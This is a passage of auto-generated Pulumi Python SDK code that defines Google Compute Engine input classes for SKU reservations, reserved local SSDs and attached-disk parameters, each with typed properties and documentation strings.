:param pulumi.Input[str] subnetwork_range_name: The name of a subnetwork secondary IP range from which to allocate an IP alias range. If not specified, the primary range of the subnetwork is used.
"""
if ip_cidr_range is not None:
pulumi.set(__self__, "ip_cidr_range", ip_cidr_range)
if subnetwork_range_name is not None:
pulumi.set(__self__, "subnetwork_range_name", subnetwork_range_name)
@property
@pulumi.getter(name="ipCidrRange")
def ip_cidr_range(self) -> Optional[pulumi.Input[str]]:
"""
The IP alias ranges to allocate for this interface. This IP CIDR range must belong to the specified subnetwork and cannot contain IP addresses reserved by system or used by other network interfaces. This range may be a single IP address (such as 10.2.3.4), a netmask (such as /24) or a CIDR-formatted string (such as 10.1.2.0/24).
"""
return pulumi.get(self, "ip_cidr_range")
@ip_cidr_range.setter
def ip_cidr_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_cidr_range", value)
@property
@pulumi.getter(name="subnetworkRangeName")
def subnetwork_range_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of a subnetwork secondary IP range from which to allocate an IP alias range. If not specified, the primary range of the subnetwork is used.
"""
return pulumi.get(self, "subnetwork_range_name")
@subnetwork_range_name.setter
def subnetwork_range_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnetwork_range_name", value)
@pulumi.input_type
class AllocationSpecificSKUAllocationAllocatedInstancePropertiesReservedDiskArgs:
def __init__(__self__, *,
disk_size_gb: Optional[pulumi.Input[str]] = None,
interface: Optional[pulumi.Input['AllocationSpecificSKUAllocationAllocatedInstancePropertiesReservedDiskInterface']] = None):
"""
:param pulumi.Input[str] disk_size_gb: Specifies the size of the disk in base-2 GB.
:param pulumi.Input['AllocationSpecificSKUAllocationAllocatedInstancePropertiesReservedDiskInterface'] interface: Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI. For performance characteristics of SCSI over NVMe, see Local SSD performance.
"""
if disk_size_gb is not None:
pulumi.set(__self__, "disk_size_gb", disk_size_gb)
if interface is not None:
pulumi.set(__self__, "interface", interface)
@property
@pulumi.getter(name="diskSizeGb")
def disk_size_gb(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the size of the disk in base-2 GB.
"""
return pulumi.get(self, "disk_size_gb")
@disk_size_gb.setter
def disk_size_gb(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "disk_size_gb", value)
@property
@pulumi.getter
def interface(self) -> Optional[pulumi.Input['AllocationSpecificSKUAllocationAllocatedInstancePropertiesReservedDiskInterface']]:
"""
Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI. For performance characteristics of SCSI over NVMe, see Local SSD performance.
"""
return pulumi.get(self, "interface")
@interface.setter
def interface(self, value: Optional[pulumi.Input['AllocationSpecificSKUAllocationAllocatedInstancePropertiesReservedDiskInterface']]):
pulumi.set(self, "interface", value)
@pulumi.input_type
class AllocationSpecificSKUAllocationReservedInstancePropertiesArgs:
def __init__(__self__, *,
guest_accelerators: Optional[pulumi.Input[Sequence[pulumi.Input['AcceleratorConfigArgs']]]] = None,
local_ssds: Optional[pulumi.Input[Sequence[pulumi.Input['AllocationSpecificSKUAllocationAllocatedInstancePropertiesReservedDiskArgs']]]] = None,
location_hint: Optional[pulumi.Input[str]] = None,
machine_type: Optional[pulumi.Input[str]] = None,
maintenance_freeze_duration_hours: Optional[pulumi.Input[int]] = None,
maintenance_interval: Optional[pulumi.Input['AllocationSpecificSKUAllocationReservedInstancePropertiesMaintenanceInterval']] = None,
min_cpu_platform: Optional[pulumi.Input[str]] = None):
"""
Properties of the SKU instances being reserved. Next ID: 9
:param pulumi.Input[Sequence[pulumi.Input['AcceleratorConfigArgs']]] guest_accelerators: Specifies accelerator type and count.
:param pulumi.Input[Sequence[pulumi.Input['AllocationSpecificSKUAllocationAllocatedInstancePropertiesReservedDiskArgs']]] local_ssds: Specifies amount of local ssd to reserve with each instance. The type of disk is local-ssd.
:param pulumi.Input[str] location_hint: An opaque location hint used to place the allocation close to other resources. This field is for use by internal tools that use the public API.
:param pulumi.Input[str] machine_type: Specifies type of machine (name only) which has fixed number of vCPUs and fixed amount of memory. This also includes specifying custom machine type following custom-NUMBER_OF_CPUS-AMOUNT_OF_MEMORY pattern.
:param pulumi.Input[int] maintenance_freeze_duration_hours: Specifies the number of hours after reservation creation where instances using the reservation won't be scheduled for maintenance.
:param pulumi.Input['AllocationSpecificSKUAllocationReservedInstancePropertiesMaintenanceInterval'] maintenance_interval: For more information about maintenance intervals, see Setting maintenance intervals.
:param pulumi.Input[str] min_cpu_platform: Minimum cpu platform the reservation.
"""
if guest_accelerators is not None:
pulumi.set(__self__, "guest_accelerators", guest_accelerators)
if local_ssds is not None:
pulumi.set(__self__, "local_ssds", local_ssds)
if location_hint is not None:
pulumi.set(__self__, "location_hint", location_hint)
if machine_type is not None:
pulumi.set(__self__, "machine_type", machine_type)
if maintenance_freeze_duration_hours is not None:
pulumi.set(__self__, "maintenance_freeze_duration_hours", maintenance_freeze_duration_hours)
if maintenance_interval is not None:
pulumi.set(__self__, "maintenance_interval", maintenance_interval)
if min_cpu_platform is not None:
pulumi.set(__self__, "min_cpu_platform", min_cpu_platform)
@property
@pulumi.getter(name="guestAccelerators")
def guest_accelerators(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AcceleratorConfigArgs']]]]:
"""
Specifies accelerator type and count.
"""
return pulumi.get(self, "guest_accelerators")
@guest_accelerators.setter
def guest_accelerators(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AcceleratorConfigArgs']]]]):
pulumi.set(self, "guest_accelerators", value)
@property
@pulumi.getter(name="localSsds")
def local_ssds(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AllocationSpecificSKUAllocationAllocatedInstancePropertiesReservedDiskArgs']]]]:
"""
Specifies amount of local ssd to reserve with each instance. The type of disk is local-ssd.
"""
return pulumi.get(self, "local_ssds")
@local_ssds.setter
def local_ssds(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AllocationSpecificSKUAllocationAllocatedInstancePropertiesReservedDiskArgs']]]]):
pulumi.set(self, "local_ssds", value)
@property
@pulumi.getter(name="locationHint")
def location_hint(self) -> Optional[pulumi.Input[str]]:
"""
An opaque location hint used to place the allocation close to other resources. This field is for use by internal tools that use the public API.
"""
return pulumi.get(self, "location_hint")
@location_hint.setter
def location_hint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location_hint", value)
@property
@pulumi.getter(name="machineType")
def machine_type(self) -> Optional[pulumi.Input[str]]:
"""
Specifies type of machine (name only) which has fixed number of vCPUs and fixed amount of memory. This also includes specifying custom machine type following custom-NUMBER_OF_CPUS-AMOUNT_OF_MEMORY pattern.
"""
return pulumi.get(self, "machine_type")
@machine_type.setter
def machine_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "machine_type", value)
@property
@pulumi.getter(name="maintenanceFreezeDurationHours")
def maintenance_freeze_duration_hours(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the number of hours after reservation creation where instances using the reservation won't be scheduled for maintenance.
"""
return pulumi.get(self, "maintenance_freeze_duration_hours")
@maintenance_freeze_duration_hours.setter
def maintenance_freeze_duration_hours(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "maintenance_freeze_duration_hours", value)
@property
@pulumi.getter(name="maintenanceInterval")
def maintenance_interval(self) -> Optional[pulumi.Input['AllocationSpecificSKUAllocationReservedInstancePropertiesMaintenanceInterval']]:
"""
For more information about maintenance intervals, see Setting maintenance intervals.
"""
return pulumi.get(self, "maintenance_interval")
@maintenance_interval.setter
def maintenance_interval(self, value: Optional[pulumi.Input['AllocationSpecificSKUAllocationReservedInstancePropertiesMaintenanceInterval']]):
pulumi.set(self, "maintenance_interval", value)
@property
@pulumi.getter(name="minCpuPlatform")
def min_cpu_platform(self) -> Optional[pulumi.Input[str]]:
"""
Minimum cpu platform the reservation.
"""
return pulumi.get(self, "min_cpu_platform")
@min_cpu_platform.setter
def min_cpu_platform(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "min_cpu_platform", value)
@pulumi.input_type
class AllocationSpecificSKUReservationArgs:
def __init__(__self__, *,
count: Optional[pulumi.Input[str]] = None,
instance_properties: Optional[pulumi.Input['AllocationSpecificSKUAllocationReservedInstancePropertiesArgs']] = None):
"""
This reservation type allows to pre allocate specific instance configuration. Next ID: 5
:param pulumi.Input[str] count: Specifies the number of resources that are allocated.
:param pulumi.Input['AllocationSpecificSKUAllocationReservedInstancePropertiesArgs'] instance_properties: The instance properties for the reservation.
"""
if count is not None:
pulumi.set(__self__, "count", count)
if instance_properties is not None:
pulumi.set(__self__, "instance_properties", instance_properties)
@property
@pulumi.getter
def count(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the number of resources that are allocated.
"""
return pulumi.get(self, "count")
@count.setter
def count(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "count", value)
@property
@pulumi.getter(name="instanceProperties")
def instance_properties(self) -> Optional[pulumi.Input['AllocationSpecificSKUAllocationReservedInstancePropertiesArgs']]:
"""
The instance properties for the reservation.
"""
return pulumi.get(self, "instance_properties")
@instance_properties.setter
def instance_properties(self, value: Optional[pulumi.Input['AllocationSpecificSKUAllocationReservedInstancePropertiesArgs']]):
pulumi.set(self, "instance_properties", value)
@pulumi.input_type
class AttachedDiskInitializeParamsArgs:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
disk_name: Optional[pulumi.Input[str]] = None,
disk_size_gb: Optional[pulumi.Input[str]] = None,
disk_type: Optional[pulumi.Input[str]] = None,
guest_os_features: Optional[pulumi.Input[Sequence[pulumi.Input['GuestOsFeatureArgs']]]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
licenses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
multi_writer: Optional[pulumi.Input[bool]] = None,
on_update_action: Optional[pulumi.Input['AttachedDiskInitializeParamsOnUpdateAction']] = None,
provisioned_iops: Optional[pulumi.Input[str]] = None,
resource_policies: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_image: Optional[pulumi.Input[str]] = None,
source_image_encryption_key: Optional[pulumi.Input['CustomerEncryptionKeyArgs']] = None,
source_snapshot: Optional[pulumi.Input[str]] = None,
source_snapshot_encryption_key: Optional[pulumi.Input['CustomerEncryptionKeyArgs']] = None):
"""
[Input Only] Specifies the parameters for a new disk that will be created alongside the new instance. Use initialization parameters to create boot disks or local SSDs attached to the new instance. This property is mutually exclusive with the source property; you can only define one or the other, but not both.
:param pulumi.Input[str] description: An optional description. Provide this property when creating the disk.
:param pulumi.Input[str] disk_name: Specifies the disk name. If not specified, the default is to use the name of the instance. If a disk with the same name already exists in the given region, the existing disk is attached to the new instance and the new disk is not created.
:param pulumi.Input[str] disk_size_gb: Specifies the size of the disk in base-2 GB. The size must be at least 10 GB. If you specify a sourceImage, which is required for boot disks, the default size is the size of the sourceImage. If you do not specify a sourceImage, the default disk size is 500 GB.
:param pulumi.Input[str] disk_type: Specifies the disk type to use to create the instance. If not specified, the default is pd-standard, specified using the full URL. For example: https://www.googleapis.com/compute/v1/projects/project/zones/zone /diskTypes/pd-standard For a full list of acceptable values, see Persistent disk types. If you define this field, you can provide either the full or partial URL. For example, the following are valid values: - https://www.googleapis.com/compute/v1/projects/project/zones/zone /diskTypes/diskType - projects/project/zones/zone/diskTypes/diskType - zones/zone/diskTypes/diskType Note that for InstanceTemplate, this is the name of the disk type, not URL.
:param pulumi.Input[Sequence[pulumi.Input['GuestOsFeatureArgs']]] guest_os_features: A list of features to enable on the guest operating system. Applicable only for bootable images. Read Enabling guest operating system features to see a list of available options. Guest OS features are applied by merging initializeParams.guestOsFeatures and disks.guestOsFeatures
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to this disk. These can be later modified by the disks.setLabels method. This field is only applicable for persistent disks.
:param pulumi.Input[Sequence[pulumi.Input[str]]] licenses: A list of publicly visible licenses. Reserved for Google's use.
:param pulumi.Input[bool] multi_writer: Indicates whether or not the disk can be read/write attached to more than one instance.
:param pulumi.Input['AttachedDiskInitializeParamsOnUpdateAction'] on_update_action: Specifies which action to take on instance update with this disk. Default is to use the existing disk.
:param pulumi.Input[str] provisioned_iops: Indicates how many IOPS to provision for the disk. This sets the number of I/O operations per second that the disk can handle. Values must be between 10,000 and 120,000. For more details, see the Extreme persistent disk documentation.
:param pulumi.Input[Sequence[pulumi.Input[str]]] resource_policies: Resource policies applied to this disk for automatic snapshot creations. Specified using the full or partial URL. For instance template, specify only the resource policy name.
:param pulumi.Input[str] source_image: The source image to create this disk. When creating a new instance, one of initializeParams.sourceImage or initializeParams.sourceSnapshot or disks.source is required except for local SSD. To create a disk with one of the public operating system images, specify the image by its family name. For example, specify family/debian-9 to use the latest Debian 9 image: projects/debian-cloud/global/images/family/debian-9 Alternatively, use a specific version of a public operating system image: projects/debian-cloud/global/images/debian-9-stretch-vYYYYMMDD To create a disk with a custom image that you created, specify the image name in the following format: global/images/my-custom-image You can also specify a custom image by its image family, which returns the latest version of the image in that family. Replace the image name with family/family-name: global/images/family/my-image-family If the source image is deleted later, this field will not be set.
:param pulumi.Input['CustomerEncryptionKeyArgs'] source_image_encryption_key: The customer-supplied encryption key of the source image. Required if the source image is protected by a customer-supplied encryption key. Instance templates do not store customer-supplied encryption keys, so you cannot create disks for instances in a managed instance group if the source images are encrypted with your own keys.
:param pulumi.Input[str] source_snapshot: The source snapshot to create this disk. When creating a new instance, one of initializeParams.sourceSnapshot or initializeParams.sourceImage or disks.source is required except for local SSD. To create a disk with a snapshot that you created, specify the snapshot name in the following format: global/snapshots/my-backup If the source snapshot is deleted later, this field will not be set.
:param pulumi.Input['CustomerEncryptionKeyArgs'] source_snapshot_encryption_key: The customer-supplied encryption key of the source snapshot.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if disk_name is not None:
pulumi.set(__self__, "disk_name", disk_name)
if disk_size_gb is not None:
pulumi.set(__self__, "disk_size_gb", disk_size_gb)
if disk_type is not None:
pulumi.set(__self__, "disk_type", disk_type)
if guest_os_features is not None:
pulumi.set(__self__, "guest_os_features", guest_os_features)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if licenses is not None:
pulumi.set(__self__, "licenses", licenses)
if multi_writer is not None:
pulumi.set(__self__, "multi_writer", multi_writer)
if on_update_action is not None:
pulumi.set(__self__, "on_update_action", on_update_action)
if provisioned_iops is not None:
pulumi.set(__self__, "provisioned_iops", provisioned_iops)
if resource_policies is not None:
pulumi.set(__self__, "resource_policies", resource_policies)
if source_image is not None:
pulumi.set(__self__, "source_image", source_image)
if source_image_encryption_key is not None:
pulumi.set(__self__, "source_image_encryption_key", source_image_encryption_key)
if source_snapshot is not None:
pulumi.set(__self__, "source_snapshot", source_snapshot)
if source_snapshot_encryption_key is not None:
pulumi.set(__self__, "source_snapshot_encryption_key", source_snapshot_encryption_key)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description. Provide this property when creating the disk.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="diskName")
def disk_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the disk name. If not specified, the default is to use the name of the instance. If a disk with the same name already exists in the given region, the existing disk is attached to the new instance and the new disk is not created.
"""
return pulumi.get(self, "disk_name")
@disk_name.setter
def disk_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "disk_name", value)
@property
@pulumi.getter(name="diskSizeGb")
def disk_size_gb(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the size of the disk in base-2 GB. The size must be at least 10 GB. If you specify a sourceImage, which is required for boot disks, the default size is the size of the sourceImage. If you do not specify a sourceImage, the default disk size is 500 GB.
"""
return pulumi.get(self, "disk_size_gb")
@disk_size_gb.setter
def disk_size_gb(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "disk_size_gb", value)
@property
@pulumi.getter(name="diskType")
def disk_type(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the disk type to use to create the instance. If not specified, the default is pd-standard, specified using the full URL. For example: https://www.googleapis.com/compute/v1/projects/project/zones/zone /diskTypes/pd-standard For a full list of acceptable values, see Persistent disk types. If you define this field, you can provide either the full or partial URL. For example, the following are valid values: - https://www.googleapis.com/compute/v1/projects/project/zones/zone /diskTypes/diskType - projects/project/zones/zone/diskTypes/diskType - zones/zone/diskTypes/diskType Note that for InstanceTemplate, this is the name of the disk type, not URL.
"""
return pulumi.get(self, "disk_type")
@disk_type.setter
def disk_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "disk_type", value)
@property
@pulumi.getter(name="guestOsFeatures")
def guest_os_features(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GuestOsFeatureArgs']]]]:
"""
A list of features to enable on the guest operating system. Applicable only for bootable images. Read Enabling guest operating system features to see a list of available options. Guest OS features are applied by merging initializeParams.guestOsFeatures and disks.guestOsFeatures
"""
return pulumi.get(self, "guest_os_features")
@guest_os_features.setter
def guest_os_features(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GuestOsFeatureArgs']]]]):
pulumi.set(self, "guest_os_features", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Labels to apply to this disk. These can be later modified by the disks.setLabels method. This field is only applicable for persistent disks.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter
def licenses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of publicly visible licenses. Reserved for Google's use.
"""
return pulumi.get(self, "licenses")
@licenses.setter
def licenses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "licenses", value)
@property
@pulumi.getter(name="multiWriter")
def multi_writer(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether or not the disk can be read/write attached to more than one instance.
"""
return pulumi.get(self, "multi_writer")
@multi_writer.setter
def multi_writer(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "multi_writer", value)
@property
@pulumi.getter(name="onUpdateAction")
def on_update_action(self) -> Optional[pulumi.Input['AttachedDiskInitializeParamsOnUpdateAction']]:
"""
Specifies which action to take on instance update with this disk. Default is to use the existing disk.
"""
return pulumi.get(self, "on_update_action")
@on_update_action.setter
def on_update_action(self, value: Optional[pulumi.Input['AttachedDiskInitializeParamsOnUpdateAction']]):
pulumi.set(self, "on_update_action", value)
@property
@pulumi.getter(name="provisionedIops")
def provisioned_iops(self) -> Optional[pulumi.Input[str]]:
"""
Indicates how many IOPS to provision for the disk. This sets the number of I/O operations per second that the disk can handle. Values must be between 10,000 and 120,000. For more details, see the Extreme persistent disk documentation.
"""
return pulumi.get(self, "provisioned_iops")
@provisioned_iops.setter
def provisioned_iops(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "provisioned_iops", value)
@property
@pulumi.getter(name="resourcePolicies")
def resource_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Resource policies applied to this disk for automatic snapshot creations. Specified using the full or partial URL. For instance template, specify only the resource policy name.
"""
return pulumi.get(self, "resource_policies")
@resource_policies.setter
def resource_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "resource_policies", value)
@property
@pulumi.getter(name="sourceImage")
def source_image(self) -> Optional[pulumi.Input[str]]:
"""
The source image to create this disk. When creating a new instance, one of initializeParams.sourceImage or initializeParams.sourceSnapshot or disks.source is required except for local SSD. To create a disk with one of the public operating system images, specify the image by its family name. For example, specify family/debian-9 to use the latest Debian 9 image: projects/debian-cloud/global/images/family/debian-9 Alternatively, use a specific version of a public operating system image: projects/debian-cloud/global/images/debian-9-stretch-vYYYYMMDD To create a disk with a custom image that you created, specify the image name in the following format: global/images/my-custom-image You can also specify a custom image by its image family, which returns the latest version of the image in that family. Replace the image name with family/family-name: global/images/family/my-image-family If the source image is deleted later, this field will not be set.
"""
return pulumi.get(self, "source_image")
@source_image.setter
def source_image(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_image", value)
@property
@pulumi.getter(name="sourceImageEncryptionKey")
def source_image_encryption_key(self) -> Optional[pulumi.Input['CustomerEncryptionKeyArgs']]:
"""
The customer-supplied encryption key of the source image. Required if the source image is protected by a customer-supplied encryption key. Instance templates do not store customer-supplied encryption keys, so you cannot create disks for instances in a managed instance group if the source images are encrypted with your own keys.
"""
return pulumi.get(self, "source_image_encryption_key")
@source_image_encryption_key.setter
def source_image_encryption_key(self, value: Optional[pulumi.Input['CustomerEncryptionKeyArgs']]):
pulumi.set(self, "source_image_encryption_key", value)
@property
@pulumi.getter(name="sourceSnapshot")
def source_snapshot(self) -> Optional[pulumi.Input[str]]:
"""
The source snapshot to create this disk. When creating a new instance, one of initializeParams.sourceSnapshot or initializeParams.sourceImage or disks.source is required except for local SSD. To create a disk with a snapshot that you created, specify the snapshot name in the following format: global/snapshots/my-backup If the source snapshot is deleted later, this field will not be set.
"""
return pulumi.get(self, "source_snapshot")
@source_snapshot.setter
def source_snapshot(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_snapshot", value)
@property
@pulumi.getter(name="sourceSnapshotEncryptionKey")
def source_snapshot_encryption_key(self) -> Optional[pulumi.Input['CustomerEncryptionKeyArgs']]:
"""
The customer-supplied encryption key of the source snapshot.
"""
return pulumi.get(self, "source_snapshot_encryption_key")
@source_snapshot_encryption_key.setter
def source_snapshot_encryption_key(self, value: Optional[pulumi.Input['CustomerEncryptionKeyArgs']]):
pulumi.set(self, "source_snapshot_encryption_key", value)
@pulumi.input_type
class AttachedDiskArgs:
def __init__(__self__, *,
auto_delete: Optional[pulumi.Input[bool]] = None,
boot: Optional[pulumi.Input[bool]] = None,
device_name: Optional[pulumi.Input[str]] = None,
disk_encryption_key: Optional[pulumi.Input['CustomerEncryptionKeyArgs']] = None,
disk_size_gb: Optional[pulumi.Input[str]] = None,
guest_os_features: Optional[pulumi.Input[Sequence[pulumi.Input['GuestOsFeatureArgs']]]] = None,
initialize_params: Optional[pulumi.Input['AttachedDiskInitializeParamsArgs']] = None,
interface: Optional[pulumi.Input['AttachedDiskInterface']] = None,
mode: Optional[pulumi.Input['AttachedDiskMode']] = None,
source: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input['AttachedDiskType']] = None):
"""
An instance-attached disk resource.
:param pulumi.Input[bool] auto_delete: Specifies whether the disk will be auto-deleted when the instance is deleted (but not when the disk is detached from the instance).
:param pulumi.Input[bool] boot: Indicates that this is a boot disk. The virtual machine will use the first partition of the disk for its root filesystem.
:param pulumi.Input[str] device_name: Specifies a unique device name of your choice that is reflected into the /dev/disk/by-id/google-* tree of a Linux operating system running within the instance. This name can be used to reference the device for mounting, resizing, and so on, from within the instance. If not specified, the server chooses a default device name to apply to this disk, in the form persistent-disk-x, where x is a number assigned by Google Compute Engine. This field is only applicable for persistent disks.
:param pulumi.Input['CustomerEncryptionKeyArgs'] disk_encryption_key: Encrypts or decrypts a disk using a customer-supplied encryption key. If you are creating a new disk, this field encrypts the new disk using an encryption key that you provide. If you are attaching an existing disk that is already encrypted, this field decrypts the disk using the customer-supplied encryption key. If you encrypt a disk using a customer-supplied key, you must provide the same key again when you attempt to use this resource at a later time. For example, you must provide the key when you create a snapshot or an image from the disk or when you attach the disk to a virtual machine instance. If you do not provide an encryption key, then the disk will be encrypted using an automatically generated key and you do not need to provide a key to use the disk later. Instance templates do not store customer-supplied encryption keys, so you cannot use your own keys to encrypt disks in a managed instance group.
:param pulumi.Input[str] disk_size_gb: The size of the disk in GB.
:param pulumi.Input[Sequence[pulumi.Input['GuestOsFeatureArgs']]] guest_os_features: A list of features to enable on the guest operating system. Applicable only for bootable images. Read Enabling guest operating system features to see a list of available options.
:param pulumi.Input['AttachedDiskInitializeParamsArgs'] initialize_params: [Input Only] Specifies the parameters for a new disk that will be created alongside the new instance. Use initialization parameters to create boot disks or local SSDs attached to the new instance. This property is mutually exclusive with the source property; you can only define one or the other, but not both.
:param pulumi.Input['AttachedDiskInterface'] interface: Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI. Persistent disks must always use SCSI and the request will fail if you attempt to attach a persistent disk in any other format than SCSI. Local SSDs can use either NVME or SCSI. For performance characteristics of SCSI over NVMe, see Local SSD performance.
:param pulumi.Input['AttachedDiskMode'] mode: The mode in which to attach this disk, either READ_WRITE or READ_ONLY. If not specified, the default is to attach the disk in READ_WRITE mode.
:param pulumi.Input[str] source: Specifies a valid partial or full URL to an existing Persistent Disk resource. When creating a new instance, one of initializeParams.sourceImage or initializeParams.sourceSnapshot or disks.source is required except for local SSD. If desired, you can also attach existing non-root persistent disks using this property. This field is only applicable for persistent disks. Note that for InstanceTemplate, specify the disk name for zonal disk, and the URL for regional disk.
:param pulumi.Input['AttachedDiskType'] type: Specifies the type of the disk, either SCRATCH or PERSISTENT. If not specified, the default is PERSISTENT.
"""
if auto_delete is not None:
pulumi.set(__self__, "auto_delete", auto_delete)
if boot is not None:
pulumi.set(__self__, "boot", boot)
if device_name is not None:
pulumi.set(__self__, "device_name", device_name)
if disk_encryption_key is not None:
pulumi.set(__self__, "disk_encryption_key", disk_encryption_key)
if disk_size_gb is not None:
pulumi.set(__self__, "disk_size_gb", disk_size_gb)
if guest_os_features is not None:
pulumi.set(__self__, "guest_os_features", guest_os_features)
if initialize_params is not None:
pulumi.set(__self__, "initialize_params", initialize_params)
if interface is not None:
pulumi.set(__self__, "interface", interface)
if mode is not None:
pulumi.set(__self__, "mode", mode)
if source is not None:
pulumi.set(__self__, "source", source)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="autoDelete")
def auto_delete(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the disk will be auto-deleted when the instance is deleted (but not when the disk is detached from the instance).
"""
return pulumi.get(self, "auto_delete")
@auto_delete.setter
def auto_delete(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_delete", value)
@property
@pulumi.getter
def boot(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates that this is a boot disk. The virtual machine will use the first partition of the disk for its root filesystem.
"""
return pulumi.get(self, "boot")
@boot.setter
def boot(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "boot", value)
@property
@pulumi.getter(name="deviceName")
def device_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a unique device name of your choice that is reflected into the /dev/disk/by-id/google-* tree of a Linux operating system running within the instance. This name can be used to reference the device for mounting, resizing, and so on, from within the instance. If not specified, the server chooses a default device name to apply to this disk, in the form persistent-disk-x, where x is a number assigned by Google Compute Engine. This field is only applicable for persistent disks.
"""
return pulumi.get(self, "device_name")
@device_name.setter
def device_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "device_name", value)
@property
@pulumi.getter(name="diskEncryptionKey")
def disk_encryption_key(self) -> Optional[pulumi.Input['CustomerEncryptionKeyArgs']]:
"""
Encrypts or decrypts a disk using a customer-supplied encryption key. If you are creating a new disk, this field encrypts the new disk using an encryption key that you provide. If you are attaching an existing disk that is already encrypted, this field decrypts the disk using the customer-supplied encryption key. If you encrypt a disk using a customer-supplied key, you must provide the same key again when you attempt to use this resource at a later time. For example, you must provide the key when you create a snapshot or an image from the disk or when you attach the disk to a virtual machine instance. If you do not provide an encryption key, then the disk will be encrypted using an automatically generated key and you do not need to provide a key to use the disk later. Instance templates do not store customer-supplied encryption keys, so you cannot use your own keys to encrypt disks in a managed instance group.
"""
return pulumi.get(self, "disk_encryption_key")
@disk_encryption_key.setter
def disk_encryption_key(self, value: Optional[pulumi.Input['CustomerEncryptionKeyArgs']]):
pulumi.set(self, "disk_encryption_key", value)
@property
@pulumi.getter(name="diskSizeGb")
def disk_size_gb(self) -> Optional[pulumi.Input[str]]:
"""
The size of the disk in GB.
"""
return pulumi.get(self, "disk_size_gb")
@disk_size_gb.setter
def disk_size_gb(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "disk_size_gb", value)
@property
@pulumi.getter(name="guestOsFeatures")
def guest_os_features(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GuestOsFeatureArgs']]]]:
"""
A list of features to enable on the guest operating system. Applicable only for bootable images. Read Enabling guest operating system features to see a list of available options.
"""
return pulumi.get(self, "guest_os_features")
@guest_os_features.setter
def guest_os_features(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GuestOsFeatureArgs']]]]):
pulumi.set(self, "guest_os_features", value)
@property
@pulumi.getter(name="initializeParams")
def initialize_params(self) -> Optional[pulumi.Input['AttachedDiskInitializeParamsArgs']]:
"""
[Input Only] Specifies the parameters for a new disk that will be created alongside the new instance. Use initialization parameters to create boot disks or local SSDs attached to the new instance. This property is mutually exclusive with the source property; you can only define one or the other, but not both.
"""
return pulumi.get(self, "initialize_params")
@initialize_params.setter
def initialize_params(self, value: Optional[pulumi.Input['AttachedDiskInitializeParamsArgs']]):
pulumi.set(self, "initialize_params", value)
@property
@pulumi.getter
def interface(self) -> Optional[pulumi.Input['AttachedDiskInterface']]:
"""
Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI. Persistent disks must always use SCSI and the request will fail if you attempt to attach a persistent disk in any other format than SCSI. Local SSDs can use either NVME or SCSI. For performance characteristics of SCSI over NVMe, see Local SSD performance.
"""
return pulumi.get(self, "interface")
@interface.setter
def interface(self, value: Optional[pulumi.Input['AttachedDiskInterface']]):
pulumi.set(self, "interface", value)
@property
@pulumi.getter
